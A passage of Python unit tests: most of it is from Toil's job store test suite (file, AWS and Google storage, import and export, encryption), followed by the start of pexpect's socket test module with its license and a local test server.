fileTwo = jobstore1.writeFile(path, jobOnJobStore1.jobStoreID, cleanup=True)
with jobstore2.readFileStream(fileTwo) as f:
self.assertEqual(f.read(), two)
# Now update the first file from the local file ...
jobstore1.updateFile(fileOne, path)
with jobstore2.readFileStream(fileOne) as f:
self.assertEqual(f.read(), two)
finally:
os.unlink(path)
# Create a third file to test the last remaining method.
with jobstore2.writeFileStream(jobOnJobStore1.jobStoreID, cleanup=True) as (f, fileThree):
f.write(three)
with jobstore1.readFileStream(fileThree) as f:
self.assertEqual(f.read(), three)
# Delete a file explicitly but leave files for the implicit deletion through the parent
jobstore2.deleteFile(fileOne)
# Check the file is gone
#
for store in jobstore2, jobstore1:
self.assertFalse(store.fileExists(fileOne))
self.assertRaises(NoSuchFileException, store.readFile, fileOne, '')
try:
with store.readFileStream(fileOne) as _:
pass
self.fail('Expecting NoSuchFileException')
except NoSuchFileException:
pass
@travis_test
def testStatsAndLogging(self):
"""Tests behavior of reading and writting stats and logging."""
jobstore1 = self.jobstore_initialized
jobstore2 = self.jobstore_resumed_noconfig
jobOnJobStore1 = JobDescription(command='job1',
requirements=self.parentJobReqs,
jobName='test1', unitName='onJobStore1')
jobstore1.assignID(jobOnJobStore1)
jobstore1.create(jobOnJobStore1)
# Test stats and logging
stats = None
one = b'one'
two = b'two'
# Allows stats to be read/written to/from in read/writeStatsAndLogging.
def callback(f2):
stats.add(f2.read())
# Collects stats and logging messages.
stats = set()
# No stats or logging added yet. Expect nothing.
self.assertEqual(0, jobstore1.readStatsAndLogging(callback))
self.assertEqual(set(), stats)
# Test writing and reading.
jobstore2.writeStatsAndLogging(one)
self.assertEqual(1, jobstore1.readStatsAndLogging(callback))
self.assertEqual({one}, stats)
self.assertEqual(0, jobstore1.readStatsAndLogging(callback)) # readStatsAndLogging purges saved stats etc
jobstore2.writeStatsAndLogging(one)
jobstore2.writeStatsAndLogging(two)
stats = set()
self.assertEqual(2, jobstore1.readStatsAndLogging(callback))
self.assertEqual({one, two}, stats)
largeLogEntry = os.urandom(self._largeLogEntrySize())
stats = set()
jobstore2.writeStatsAndLogging(largeLogEntry)
self.assertEqual(1, jobstore1.readStatsAndLogging(callback))
self.assertEqual({largeLogEntry}, stats)
# test the readAll parameter
self.assertEqual(4, jobstore1.readStatsAndLogging(callback, readAll=True))
# Delete parent
jobstore1.delete(jobOnJobStore1.jobStoreID)
self.assertFalse(jobstore1.exists(jobOnJobStore1.jobStoreID))
# TODO: Who deletes the shared files?
@travis_test
def testWriteLogFiles(self):
"""Test writing log files."""
jobNames = ['testStatsAndLogging_writeLogFiles']
jobLogList = ['string', b'bytes', '', b'newline\n']
config = self._createConfig()
setattr(config, 'writeLogs', '.')
setattr(config, 'writeLogsGzip', None)
StatsAndLogging.writeLogFiles(jobNames, jobLogList, config)
jobLogFile = os.path.join(config.writeLogs, jobNames[0] + '000.log')
self.assertTrue(os.path.isfile(jobLogFile))
with open(jobLogFile, 'r') as f:
self.assertEqual(f.read(), 'string\nbytes\n\nnewline\n')
os.remove(jobLogFile)
@travis_test
def testBatchCreate(self):
"""Test creation of many jobs."""
jobstore = self.jobstore_initialized
jobRequirements = dict(memory=12, cores=34, disk=35, preemptable=True)
jobs = []
with jobstore.batch():
for i in range(100):
overlargeJob = JobDescription(command='overlarge',
requirements=jobRequirements,
jobName='test-overlarge', unitName='onJobStore')
jobstore.assignID(overlargeJob)
jobstore.create(overlargeJob)
jobs.append(overlargeJob)
for job in jobs:
self.assertTrue(jobstore.exists(job.jobStoreID))
@travis_test
def testGrowingAndShrinkingJob(self):
"""Make sure jobs update correctly if they grow/shrink."""
# Make some very large data, large enough to trigger
# overlarge job creation if that's a thing
# (i.e. AWSJobStore)
arbitraryLargeData = os.urandom(500000)
job = self.arbitraryJob()
self.jobstore_initialized.assignID(job)
self.jobstore_initialized.create(job)
# Make the job grow
job.foo_attribute = arbitraryLargeData
self.jobstore_initialized.update(job)
check_job = self.jobstore_initialized.load(job.jobStoreID)
self.assertEqual(check_job.foo_attribute, arbitraryLargeData)
# Make the job shrink back close to its original size
job.foo_attribute = None
self.jobstore_initialized.update(job)
check_job = self.jobstore_initialized.load(job.jobStoreID)
self.assertEqual(check_job.foo_attribute, None)
def _prepareTestFile(self, store, size=None):
"""
Generates a URL that can be used to point at a test file in the storage mechanism
used by the job store under test by this class. Optionally creates a file at that URL.
:param: store: an object referencing the store, same type as _createExternalStore's
return value
:param int size: The size of the test file to be created.
:return: the URL, or a tuple (url, md5) where md5 is the file's hexadecimal MD5 digest
:rtype: str|(str,str)
"""
raise NotImplementedError()
@abstractmethod
def _hashTestFile(self, url):
"""
Returns hexadecimal MD5 digest of the contents of the file pointed at by the URL.
"""
raise NotImplementedError()
@abstractmethod
def _createExternalStore(self):
raise NotImplementedError()
@abstractmethod
def _cleanUpExternalStore(self, store):
"""
:param: store: an object referencing the store, same type as _createExternalStore's
return value
"""
raise NotImplementedError()
externalStoreCache = {}
def _externalStore(self):
try:
store = self.externalStoreCache[self]
except KeyError:
logger.debug('Creating new external store for %s', self)
store = self.externalStoreCache[self] = self._createExternalStore()
else:
logger.debug('Reusing external store for %s', self)
return store
@classmethod
def cleanUpExternalStores(cls):
for test, store in iteritems(cls.externalStoreCache):
logger.debug('Cleaning up external store for %s.', test)
test._cleanUpExternalStore(store)
mpTestPartSize = 5 << 20
@classmethod
def makeImportExportTests(cls):
testClasses = [FileJobStoreTest, AWSJobStoreTest, GoogleJobStoreTest]
activeTestClassesByName = {testCls.__name__: testCls
for testCls in testClasses
if not getattr(testCls, '__unittest_skip__', False)}
def testImportExportFile(self, otherCls, size, moveExports):
"""
:param AbstractJobStoreTest.Test self: the current test case
:param AbstractJobStoreTest.Test otherCls: the test case class for the job store
to import from or export to
:param int size: the size of the file to test importing/exporting with
"""
# Prepare test file in other job store
self.jobstore_initialized.partSize = cls.mpTestPartSize
self.jobstore_initialized.moveExports = moveExports
# The string in otherCls() is arbitrary as long as it returns a class that has access
# to ._externalStore() and ._prepareTestFile()
other = otherCls('testSharedFiles')
store = other._externalStore()
srcUrl, srcMd5 = other._prepareTestFile(store, size)
# Import into job store under test
jobStoreFileID = self.jobstore_initialized.importFile(srcUrl)
self.assertTrue(isinstance(jobStoreFileID, FileID))
with self.jobstore_initialized.readFileStream(jobStoreFileID) as f:
fileMD5 = hashlib.md5(f.read()).hexdigest()
self.assertEqual(fileMD5, srcMd5)
# Export back into other job store
dstUrl = other._prepareTestFile(store)
self.jobstore_initialized.exportFile(jobStoreFileID, dstUrl)
self.assertEqual(fileMD5, other._hashTestFile(dstUrl))
if otherCls.__name__ == 'FileJobStoreTest':
if isinstance(self.jobstore_initialized, FileJobStore):
jobStorePath = self.jobstore_initialized._getFilePathFromId(jobStoreFileID)
jobStoreHasLink = os.path.islink(jobStorePath)
if self.jobstore_initialized.moveExports:
# Ensure the export performed a move / link
self.assertTrue(jobStoreHasLink)
self.assertEqual(os.path.realpath(jobStorePath), dstUrl[7:])
else:
# Ensure the export has not moved the job store file
self.assertFalse(jobStoreHasLink)
# Remove local Files
os.remove(srcUrl[7:])
os.remove(dstUrl[7:])
make_tests(testImportExportFile, cls, otherCls=activeTestClassesByName,
size=dict(zero=0,
one=1,
oneMiB=2 ** 20,
partSizeMinusOne=cls.mpTestPartSize - 1,
partSize=cls.mpTestPartSize,
partSizePlusOne=cls.mpTestPartSize + 1),
moveExports={'deactivated': None, 'activated': True})
def testImportSharedFile(self, otherCls):
"""
:param AbstractJobStoreTest.Test self: the current test case
:param AbstractJobStoreTest.Test otherCls: the test case class for the job store
to import from or export to
"""
# Prepare test file in other job store
self.jobstore_initialized.partSize = cls.mpTestPartSize
other = otherCls('testSharedFiles')
store = other._externalStore()
srcUrl, srcMd5 = other._prepareTestFile(store, 42)
# Import into job store under test
self.assertIsNone(self.jobstore_initialized.importFile(srcUrl, sharedFileName='foo'))
with self.jobstore_initialized.readSharedFileStream('foo') as f:
fileMD5 = hashlib.md5(f.read()).hexdigest()
self.assertEqual(fileMD5, srcMd5)
if otherCls.__name__ == 'FileJobStoreTest': # Remove local Files
os.remove(srcUrl[7:])
make_tests(testImportSharedFile,
cls,
otherCls=activeTestClassesByName)
@travis_test
def testImportHttpFile(self):
'''Test importing a file over HTTP.'''
http = socketserver.TCPServer(('', 0), StubHttpRequestHandler)
try:
httpThread = threading.Thread(target=http.serve_forever)
httpThread.start()
try:
assignedPort = http.server_address[1]
url = 'http://localhost:%d' % assignedPort
with self.jobstore_initialized.readFileStream(
self.jobstore_initialized.importFile(url)) as readable:
f1 = readable.read()
f2 = StubHttpRequestHandler.fileContents
if isinstance(f1, bytes) and not isinstance(f2, bytes):
f1 = f1.decode()
if isinstance(f2, bytes) and not isinstance(f1, bytes):
f1 = f1.encode()
self.assertEqual(f1, f2)
finally:
http.shutdown()
httpThread.join()
finally:
http.server_close()
@travis_test
def testImportFtpFile(self):
'''Test importing a file over FTP'''
ftpfile = {'name': 'foo', 'content': 'foo bar baz qux'}
ftp = FTPStubServer(0)
ftp.run()
try:
ftp.add_file(**ftpfile)
assignedPort = ftp.server.server_address[1]
url = 'ftp://user1:passwd@localhost:%d/%s' % (assignedPort, ftpfile['name'])
with self.jobstore_initialized.readFileStream(self.jobstore_initialized.importFile(url)) as readable:
imported_content = readable.read()
# python 2/3 string/bytestring compat
if isinstance(imported_content, bytes):
imported_content = imported_content.decode('utf-8')
self.assertEqual(imported_content, ftpfile['content'])
finally:
ftp.stop()
@slow
def testFileDeletion(self):
"""
Intended to cover the batch deletion of items in the AWSJobStore, but it doesn't hurt
running it on the other job stores.
"""
n = self._batchDeletionSize()
for numFiles in (1, n - 1, n, n + 1, 2 * n):
job = self.arbitraryJob()
self.jobstore_initialized.assignID(job)
self.jobstore_initialized.create(job)
fileIDs = [self.jobstore_initialized.getEmptyFileStoreID(job.jobStoreID, cleanup=True) for _ in
range(0, numFiles)]
self.jobstore_initialized.delete(job.jobStoreID)
for fileID in fileIDs:
# NB: the fooStream() methods return context managers
self.assertRaises(NoSuchFileException, self.jobstore_initialized.readFileStream(fileID).__enter__)
@slow
def testMultipartUploads(self):
"""
This test is meant to cover multi-part uploads in the AWSJobStore but it doesn't hurt
running it against the other job stores as well.
"""
# http://unix.stackexchange.com/questions/11946/how-big-is-the-pipe-buffer
bufSize = 65536
partSize = self._partSize()
self.assertEqual(partSize % bufSize, 0)
job = self.arbitraryJob()
self.jobstore_initialized.assignID(job)
self.jobstore_initialized.create(job)
# Test file/stream ending on part boundary and within a part
for partsPerFile in (1, 2.33):
checksum = hashlib.md5()
checksumQueue = Queue(2)
# FIXME: Having a separate thread is probably overkill here
def checksumThreadFn():
while True:
_buf = checksumQueue.get()
if _buf is None:
break
checksum.update(_buf)
# Multipart upload from stream
checksumThread = Thread(target=checksumThreadFn)
checksumThread.start()
try:
# Should not block. On Linux, /dev/random blocks when it's running low on entropy
with open('/dev/urandom', 'rb') as readable:
with self.jobstore_initialized.writeFileStream(job.jobStoreID, cleanup=True) as (
writable, fileId):
for i in range(int(partSize * partsPerFile / bufSize)):
buf = readable.read(bufSize)
checksumQueue.put(buf)
writable.write(buf)
finally:
checksumQueue.put(None)
checksumThread.join()
before = checksum.hexdigest()
# Verify
checksum = hashlib.md5()
with self.jobstore_initialized.readFileStream(fileId) as readable:
while True:
buf = readable.read(bufSize)
if not buf:
break
checksum.update(buf)
after = checksum.hexdigest()
self.assertEqual(before, after)
# Multi-part upload from file
checksum = hashlib.md5()
fh, path = tempfile.mkstemp()
try:
with os.fdopen(fh, 'wb+') as writable:
with open('/dev/urandom', 'rb') as readable:
for i in range(int(partSize * partsPerFile / bufSize)):
buf = readable.read(bufSize)
writable.write(buf)
checksum.update(buf)
fileId = self.jobstore_initialized.writeFile(path, job.jobStoreID, cleanup=True)
finally:
os.unlink(path)
before = checksum.hexdigest()
# Verify
checksum = hashlib.md5()
with self.jobstore_initialized.readFileStream(fileId) as readable:
while True:
buf = readable.read(bufSize)
if not buf:
break
checksum.update(buf)
after = checksum.hexdigest()
self.assertEqual(before, after)
self.jobstore_initialized.delete(job.jobStoreID)
@travis_test
def testZeroLengthFiles(self):
'''Test reading and writing of empty files.'''
job = self.arbitraryJob()
self.jobstore_initialized.assignID(job)
self.jobstore_initialized.create(job)
nullFile = self.jobstore_initialized.writeFile('/dev/null', job.jobStoreID, cleanup=True)
with self.jobstore_initialized.readFileStream(nullFile) as f:
assert not f.read()
with self.jobstore_initialized.writeFileStream(job.jobStoreID, cleanup=True) as (f, nullStream):
pass
with self.jobstore_initialized.readFileStream(nullStream) as f:
assert not f.read()
self.jobstore_initialized.delete(job.jobStoreID)
@slow
def testLargeFile(self):
'''Test the reading and writing of large files.'''
# Write a large file.
dirPath = self._createTempDir()
filePath = os.path.join(dirPath, 'large')
hashIn = hashlib.md5()
with open(filePath, 'wb') as f:
for i in range(0, 10):
buf = os.urandom(self._partSize())
f.write(buf)
hashIn.update(buf)
# Load the file into a jobstore.
job = self.arbitraryJob()
self.jobstore_initialized.assignID(job)
self.jobstore_initialized.create(job)
jobStoreFileID = self.jobstore_initialized.writeFile(filePath, job.jobStoreID, cleanup=True)
# Remove the local file.
os.unlink(filePath)
# Write a local copy of the file from the jobstore.
self.jobstore_initialized.readFile(jobStoreFileID, filePath)
# Reread the file to confirm success.
hashOut = hashlib.md5()
with open(filePath, 'rb') as f:
while True:
buf = f.read(self._partSize())
if not buf:
break
hashOut.update(buf)
self.assertEqual(hashIn.digest(), hashOut.digest())
def assertUrl(self, url):
prefix, path = url.split(':', 1)
if prefix == 'file':
self.assertTrue(os.path.exists(path))
else:
try:
urlopen(Request(url))
except:
self.fail()
@slow
def testCleanCache(self):
# Make a bunch of jobs
jobstore = self.jobstore_initialized
# Create parent job
rootJob = self.arbitraryJob()
self.jobstore_initialized.assignID(rootJob)
self.jobstore_initialized.create(rootJob)
# Create a bunch of child jobs
for i in range(100):
child = self.arbitraryJob()
self.jobstore_initialized.assignID(child)
self.jobstore_initialized.create(child)
rootJob.addChild(child.jobStoreID)
jobstore.update(rootJob)
# Make the parent the root
jobstore.setRootJob(rootJob.jobStoreID)
# See how long it takes to clean with no cache
noCacheStart = time.time()
jobstore.clean()
noCacheEnd = time.time()
noCacheTime = noCacheEnd - noCacheStart
# Make sure we have all the jobs: root and children.
self.assertEqual(len(list(jobstore.jobs())), 101)
# See how long it takes to clean with cache
jobCache = {job.jobStoreID: job
for job in jobstore.jobs()}
cacheStart = time.time()
jobstore.clean(jobCache)
cacheEnd = time.time()
cacheTime = cacheEnd - cacheStart
logger.debug("Without cache: %f, with cache: %f.", noCacheTime, cacheTime)
# Running with the cache should be faster.
self.assertTrue(cacheTime <= noCacheTime)
# NB: the 'thread' method seems to be needed here to actually
# ensure the timeout is raised, probably because the only
# "live" thread doesn't hold the GIL.
@travis_test
@pytest.mark.timeout(45, method='thread')
def testPartialReadFromStream(self):
"""Test whether readFileStream will deadlock on a partial read."""
job = self.arbitraryJob()
self.jobstore_initialized.assignID(job)
self.jobstore_initialized.create(job)
with self.jobstore_initialized.writeFileStream(job.jobStoreID, cleanup=True) as (f, fileID):
# Write enough data to make sure the writer thread
# will get blocked on the write. Technically anything
# greater than the pipe buffer size plus the libc
# buffer size (64K + 4K(?)) should trigger this bug,
# but this gives us a lot of extra room just to be sure.
# python 3 requires self.fileContents to be a bytestring
a = 'a'
if sys.version_info >= (3, 0):
a = b'a'
f.write(a * 300000)
with self.jobstore_initialized.readFileStream(fileID) as f:
self.assertEqual(f.read(1), a)
# If it times out here, there's a deadlock
@abstractmethod
def _corruptJobStore(self):
"""
Deletes some part of the physical storage represented by a job store.
"""
raise NotImplementedError()
@slow
def testDestructionOfCorruptedJobStore(self):
self._corruptJobStore()
jobstore = self._createJobStore()
jobstore.destroy()
# Note that self.jobstore_initialized.destroy() is done as part of shutdown
@travis_test
def testDestructionIdempotence(self):
# Jobstore is fully initialized
self.jobstore_initialized.destroy()
# Create a second instance for the same physical storage but do not .initialize() or
# .resume() it.
cleaner = self._createJobStore()
cleaner.destroy()
# And repeat
self.jobstore_initialized.destroy()
cleaner = self._createJobStore()
cleaner.destroy()
@travis_test
def testEmptyFileStoreIDIsReadable(self):
"""Simply creates an empty fileStoreID and attempts to read from it."""
id = self.jobstore_initialized.getEmptyFileStoreID()
fh, path = tempfile.mkstemp()
try:
self.jobstore_initialized.readFile(id, path)
self.assertTrue(os.path.isfile(path))
finally:
os.unlink(path)
def _largeLogEntrySize(self):
"""
Sub-classes may want to override these in order to maximize test coverage
"""
return 1 * 1024 * 1024
def _batchDeletionSize(self):
return 10
def _partSize(self):
return 5 * 1024 * 1024
class AbstractEncryptedJobStoreTest(object):
# noinspection PyAbstractClass
class Test(with_metaclass(ABCMeta, AbstractJobStoreTest.Test)):
"""
A test of job stores that use encryption
"""
def setUp(self):
# noinspection PyAttributeOutsideInit
self.sseKeyDir = tempfile.mkdtemp()
super(AbstractEncryptedJobStoreTest.Test, self).setUp()
def tearDown(self):
super(AbstractEncryptedJobStoreTest.Test, self).tearDown()
shutil.rmtree(self.sseKeyDir)
def _createConfig(self):
config = super(AbstractEncryptedJobStoreTest.Test, self)._createConfig()
sseKeyFile = os.path.join(self.sseKeyDir, 'keyFile')
with open(sseKeyFile, 'w') as f:
f.write('01234567890123456789012345678901')
config.sseKey = sseKeyFile
# config.attrib['sse_key'] = sseKeyFile
return config
def testEncrypted(self):
"""
Create an encrypted file. Read it in encrypted mode then try with encryption off
to ensure that it fails.
"""
phrase = 'This file is encrypted.'.encode('utf-8')
fileName = 'foo'
with self.jobstore_initialized.writeSharedFileStream(fileName, isProtected=True) as f:
f.write(phrase)
with self.jobstore_initialized.readSharedFileStream(fileName) as f:
self.assertEqual(phrase, f.read())
# disable encryption
self.jobstore_initialized.config.sseKey = None
try:
with self.jobstore_initialized.readSharedFileStream(fileName) as f:
self.assertEqual(phrase, f.read())
except AssertionError as e:
self.assertEqual("Content is encrypted but no key was provided.", e.args[0])
else:
self.fail("Read encryption content with encryption off.")
class FileJobStoreTest(AbstractJobStoreTest.Test):
def _createJobStore(self):
# Make a FileJobStore with an artificially low fan out threshold, to
# make sure to test fan out logic
return FileJobStore(self.namePrefix, fanOut=2)
def _corruptJobStore(self):
assert isinstance(self.jobstore_initialized, FileJobStore) # type hint
shutil.rmtree(self.jobstore_initialized.jobStoreDir)
def _prepareTestFile(self, dirPath, size=None):
fileName = 'testfile_%s' % uuid.uuid4()
localFilePath = dirPath + fileName
url = 'file://%s' % localFilePath
if size is None:
return url
else:
content = os.urandom(size)
with open(localFilePath, 'wb') as writable:
writable.write(content)
return url, hashlib.md5(content).hexdigest()
def _hashTestFile(self, url):
localFilePath = FileJobStore._extractPathFromUrl(urlparse.urlparse(url))
with open(localFilePath, 'rb') as f:
return hashlib.md5(f.read()).hexdigest()
def _createExternalStore(self):
return tempfile.mkdtemp()
def _cleanUpExternalStore(self, dirPath):
shutil.rmtree(dirPath)
@travis_test
def testPreserveFileName(self):
"Check that the fileID ends with the given file name."
fh, path = tempfile.mkstemp()
try:
os.close(fh)
job = self.arbitraryJob()
self.jobstore_initialized.assignID(job)
self.jobstore_initialized.create(job)
fileID = self.jobstore_initialized.writeFile(path, job.jobStoreID, cleanup=True)
self.assertTrue(fileID.endswith(os.path.basename(path)))
finally:
os.unlink(path)
@needs_google
class GoogleJobStoreTest(AbstractJobStoreTest.Test):
projectID = os.getenv('TOIL_GOOGLE_PROJECTID')
headers = {"x-goog-project-id": projectID}
def _createJobStore(self):
from toil.jobStores.googleJobStore import GoogleJobStore
return GoogleJobStore(GoogleJobStoreTest.projectID + ":" + self.namePrefix)
def _corruptJobStore(self):
# The Google job store has only one resource, the bucket, so we can't corrupt it without
# fully deleting it.
pass
def _prepareTestFile(self, bucket, size=None):
from toil.jobStores.googleJobStore import GoogleJobStore
fileName = 'testfile_%s' % uuid.uuid4()
url = 'gs://%s/%s' % (bucket.name, fileName)
if size is None:
return url
with open('/dev/urandom', 'rb') as readable:
contents = str(readable.read(size))
GoogleJobStore._writeToUrl(StringIO(contents), urlparse.urlparse(url))
return url, hashlib.md5(contents).hexdigest()
def _hashTestFile(self, url):
from toil.jobStores.googleJobStore import GoogleJobStore
contents = GoogleJobStore._getBlobFromURL(urlparse.urlparse(url)).download_as_string()
return hashlib.md5(contents).hexdigest()
@googleRetry
def _createExternalStore(self):
from google.cloud import storage
bucketName = ("import-export-test-" + str(uuid.uuid4()))
storageClient = storage.Client()
return storageClient.create_bucket(bucketName)
@googleRetry
def _cleanUpExternalStore(self, bucket):
# this is copied from googleJobStore.destroy
try:
bucket.delete(force=True)
# throws ValueError if bucket has more than 256 objects. Then we must delete manually
except ValueError:
bucket.delete_blobs(bucket.list_blobs)
bucket.delete()
@needs_aws_s3
class AWSJobStoreTest(AbstractJobStoreTest.Test):
def _createJobStore(self):
from toil.jobStores.aws.jobStore import AWSJobStore
partSize = self._partSize()
return AWSJobStore(self.awsRegion() + ':' + self.namePrefix, partSize=partSize)
def _corruptJobStore(self):
from toil.jobStores.aws.jobStore import AWSJobStore
assert isinstance(self.jobstore_initialized, AWSJobStore) # type hinting
self.jobstore_initialized.destroy()
def testSDBDomainsDeletedOnFailedJobstoreBucketCreation(self):
"""
This test ensures that SDB domains bound to a jobstore are deleted if the jobstore bucket
failed to be created. We simulate a failed jobstore bucket creation by using a bucket in a
different region with the same name.
"""
from boto.sdb import connect_to_region
from boto.s3.connection import Location, S3Connection
from boto.exception import S3ResponseError
from toil.jobStores.aws.jobStore import BucketLocationConflictException
from toil.jobStores.aws.utils import retry_s3
externalAWSLocation = Location.USWest
for testRegion in 'us-east-1', 'us-west-2':
# We run this test twice, once with the default s3 server us-east-1 as the test region
# and once with another server (us-west-2). The external server is always us-west-1.
# This incidentally tests that the BucketLocationConflictException is thrown when using
# both the default, and a non-default server.
testJobStoreUUID = str(uuid.uuid4())
# Create the bucket at the external region
s3 = S3Connection()
for attempt in retry_s3(delays=(2, 5, 10, 30, 60), timeout=600):
with attempt:
bucket = s3.create_bucket('domain-test-' + testJobStoreUUID + '--files',
location=externalAWSLocation)
options = Job.Runner.getDefaultOptions('aws:' + testRegion + ':domain-test-' +
testJobStoreUUID)
options.logLevel = 'DEBUG'
try:
with Toil(options) as toil:
pass
except BucketLocationConflictException:
# Catch the expected BucketLocationConflictException and ensure that the bound
# domains don't exist in SDB.
sdb = connect_to_region(self.awsRegion())
next_token = None
allDomainNames = []
while True:
domains = sdb.get_all_domains(max_domains=100, next_token=next_token)
allDomainNames.extend([x.name for x in domains])
next_token = domains.next_token
if next_token is None:
break
self.assertFalse([d for d in allDomainNames if testJobStoreUUID in d])
else:
self.fail()
finally:
try:
for attempt in retry_s3():
with attempt:
s3.delete_bucket(bucket=bucket)
except S3ResponseError as e:
# The actual HTTP code of the error is in status.
# See https://github.com/boto/boto/blob/91ba037e54ef521c379263b0ac769c66182527d7/boto/exception.py#L77-L80
# See also: https://github.com/boto/boto/blob/91ba037e54ef521c379263b0ac769c66182527d7/boto/exception.py#L154-L156
if e.status == 404:
# The bucket doesn't exist; maybe a failed delete actually succeeded.
pass
else:
raise
@slow
def testInlinedFiles(self):
from toil.jobStores.aws.jobStore import AWSJobStore
jobstore = self.jobstore_initialized
for encrypted in (True, False):
n = AWSJobStore.FileInfo.maxInlinedSize()
sizes = (1, old_div(n, 2), n - 1, n, n + 1, 2 * n)
for size in chain(sizes, islice(reversed(sizes), 1)):
s = os.urandom(size)
with jobstore.writeSharedFileStream('foo') as f:
f.write(s)
with jobstore.readSharedFileStream('foo') as f:
self.assertEqual(s, f.read())
def testOverlargeJob(self):
jobstore = self.jobstore_initialized
jobRequirements = dict(memory=12, cores=34, disk=35, preemptable=True)
overlargeJob = JobDescription(command='overlarge',
requirements=jobRequirements,
jobName='test-overlarge', unitName='onJobStore')
# Make the pickled size of the job larger than 256K
with open("/dev/urandom", 'rb') as random:
overlargeJob.jobName = str(random.read(512 * 1024))
jobstore.assignID(overlargeJob)
jobstore.create(overlargeJob)
self.assertTrue(jobstore.exists(overlargeJob.jobStoreID))
overlargeJobDownloaded = jobstore.load(overlargeJob.jobStoreID)
# Because jobs lack equality comparison, we stringify for comparison.
jobsInJobStore = [str(job) for job in jobstore.jobs()]
self.assertEqual(jobsInJobStore, [str(overlargeJob)])
jobstore.delete(overlargeJob.jobStoreID)
def _prepareTestFile(self, bucket, size=None):
fileName = 'testfile_%s' % uuid.uuid4()
url = 's3://%s/%s' % (bucket.name, fileName)
if size is None:
return url
with open('/dev/urandom', 'rb') as readable:
bucket.new_key(fileName).set_contents_from_string(str(readable.read(size)))
return url, hashlib.md5(bucket.get_key(fileName).get_contents_as_string()).hexdigest()
def _hashTestFile(self, url):
from toil.jobStores.aws.jobStore import AWSJobStore
key = AWSJobStore._getKeyForUrl(urlparse.urlparse(url), existing=True)
try:
contents = key.get_contents_as_string()
finally:
key.bucket.connection.close()
return hashlib.md5(contents).hexdigest()
def _createExternalStore(self):
import boto.s3
from toil.jobStores.aws.utils import region_to_bucket_location
s3 = boto.s3.connect_to_region(self.awsRegion())
try:
return s3.create_bucket(bucket_name='import-export-test-%s' % uuid.uuid4(),
location=region_to_bucket_location(self.awsRegion()))
except:
with panic(log=logger):
s3.close()
def _cleanUpExternalStore(self, bucket):
try:
for key in bucket.list():
key.delete()
bucket.delete()
finally:
bucket.connection.close()
def _largeLogEntrySize(self):
from toil.jobStores.aws.jobStore import AWSJobStore
# So we get into the else branch of reader() in uploadStream(multiPart=False):
return AWSJobStore.FileInfo.maxBinarySize() * 2
def _batchDeletionSize(self):
from toil.jobStores.aws.jobStore import AWSJobStore
return AWSJobStore.itemsPerBatchDelete
@needs_aws_s3
class InvalidAWSJobStoreTest(ToilTest):
def testInvalidJobStoreName(self):
from toil.jobStores.aws.jobStore import AWSJobStore
self.assertRaises(ValueError,
AWSJobStore,
'us-west-2:a--b')
self.assertRaises(ValueError,
AWSJobStore,
'us-west-2:' + ('a' * 100))
self.assertRaises(ValueError,
AWSJobStore,
'us-west-2:a_b')
@needs_aws_s3
@needs_encryption
@slow
class EncryptedAWSJobStoreTest(AWSJobStoreTest, AbstractEncryptedJobStoreTest.Test):
pass
class StubHttpRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
fileContents = 'A good programmer looks both ways before crossing a one-way street'
def do_GET(self):
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.send_header("Content-length", len(self.fileContents))
self.end_headers()
# python 3 requires self.fileContents to be a bytestring
if sys.version_info >= (3, 0):
self.fileContents = self.fileContents.encode('utf-8')
self.wfile.write(self.fileContents)
AbstractJobStoreTest.Test.makeImportExportTests()
|
test_socket.py
|
#!/usr/bin/env python
'''
PEXPECT LICENSE
This license is approved by the OSI and FSF as GPL-compatible.
http://opensource.org/licenses/isc-license.txt
Copyright (c) 2012, Noah Spurrier <noah@noah.org>
PERMISSION TO USE, COPY, MODIFY, AND/OR DISTRIBUTE THIS SOFTWARE FOR ANY
PURPOSE WITH OR WITHOUT FEE IS HEREBY GRANTED, PROVIDED THAT THE ABOVE
COPYRIGHT NOTICE AND THIS PERMISSION NOTICE APPEAR IN ALL COPIES.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
'''
import pexpect
from pexpect import fdpexpect
import unittest
from . import PexpectTestCase
import multiprocessing
import os
import signal
import socket
import time
import errno
class SocketServerError(Exception):
pass
class ExpectTestCase(PexpectTestCase.PexpectTestCase):
def setUp(self):
print(self.id())
PexpectTestCase.PexpectTestCase.setUp(self)
self.host = '127.0.0.1'
self.port = 49152 + 10000
self.motd = b"""\
------------------------------------------------------------------------------
* Welcome to the SOCKET UNIT TEST code! *
------------------------------------------------------------------------------
* *
* This unit test code is our best effort at testing the ability of the *
* pexpect library to handle sockets. We need some text to test buffer size *
* handling. *
* *
* A page is 1024 bytes or 1K. 80 x 24 = 1920. So a standard terminal window *
* contains more than one page. We actually want more than a page for our *
* tests. *
* *
* This is the twelfth line, and we need 24. So we need a few more paragraphs.*
* We can keep them short and just put lines between them. *
* *
* The 80 x 24 terminal size comes from the ancient past when computers were *
* only able to display text in cuneiform writing. *
* *
* The cunieform writing system used the edge of a reed to make marks on clay *
* tablets. *
* *
* It was the forerunner of the style of handwriting used by doctors to write *
* prescriptions. Thus the name: pre (before) script (writing) ion (charged *
* particle). *
------------------------------------------------------------------------------
""".replace(b'\n', b'\n\r') + b"\r\n"
self.prompt1 = b'Press Return to continue:'
self.prompt2 = b'Rate this unit test>'
self.prompt3 = b'Press X to exit:'
self.enter = b'\r\n'
self.exit = b'X\r\n'
self.server_up = multiprocessing.Event()
self.server_process = multiprocessing.Process(target=self.socket_server, args=(self.server_up,))
self.server_process.daemon = True
self.server_process.start()
counter = 0
while not self.server_up.is_set():
time.sleep(0.250)
counter += 1
if counter > (10 / 0.250):
raise SocketServerError("Could not start socket server")
def tearDown(self):
os.kill(self.server_process.pid, signal.SIGINT)
self.server_process.join(timeout=5.0)
PexpectTestCase.PexpectTestCase.tearDown(self)
def socket_server(self, server_up):
sock = None
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
